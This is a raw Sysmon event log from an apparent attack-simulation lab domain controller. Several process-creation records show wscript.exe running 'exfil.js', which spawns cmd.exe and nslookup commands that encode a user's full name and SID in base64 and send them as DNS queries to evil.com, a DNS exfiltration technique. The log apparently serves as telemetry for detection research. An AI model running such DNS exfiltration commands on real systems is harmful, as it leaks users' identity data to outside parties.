AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51460- 354300x8000000000000000217448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.233{00000000-0000-0000-0000-000000000000}5628<unknown process>-udptruefalse127.0.0.1-51460-false127.0.0.1-53domain 354300x8000000000000000217447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.109{00000000-0000-0000-0000-000000000000}7532<unknown process>-udpfalsefalse127.0.0.1-51459-false127.0.0.1-53domain 354300x8000000000000000217446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.109{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-53domainfalse127.0.0.1-51459- 354300x8000000000000000217445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.108{00000000-0000-0000-0000-000000000000}7532<unknown process>-udpfalsefalse127.0.0.1-51458-false127.0.0.1-53domain 354300x8000000000000000217444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.107{00000000-0000-0000-0000-000000000000}7532<unknown process>-udpfalsefalse127.0.0.1-51457-false127.0.0.1-53domain 354300x8000000000000000217443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:55.106{00000000-0000-0000-0000-000000000000}7532<unknown process>-udptruefalse127.0.0.1-51457-false127.0.0.1-53domain 10341000x8000000000000000217442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.413{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0F47-000000005F02}6216C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.413{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0F47-000000005F02}6216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.413{2E1864BB-1905-629A-0F47-000000005F02}6216908C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0E47-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.390{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0F47-000000005F02}6216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0E47-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-18E0-629A-6742-000000005F02}39765792C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-0E47-000000005F02}7804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.389{2E1864BB-1905-629A-0E47-000000005F02}7804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlexs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.375{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlukhhna.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-1905-629A-0C47-000000005F02}78247852C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0D47-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0D47-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.343{2E1864BB-1905-629A-0B47-000000005F02}61687396C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-0D47-000000005F02}7488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.350{2E1864BB-1905-629A-0D47-000000005F02}7488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-0B47-000000005F02}6168C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlukhhna.tmp 2>&1 10341000x8000000000000000217422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.312{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0C47-000000005F02}7824C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.312{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-0C47-000000005F02}7824C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.312{2E1864BB-1905-629A-0C47-000000005F02}78247852C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-0B47-000000005F02}6168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0C47-000000005F02}7824C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-0B47-000000005F02}6168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.290{2E1864BB-18E0-629A-6742-000000005F02}39767376C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-0B47-000000005F02}6168C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 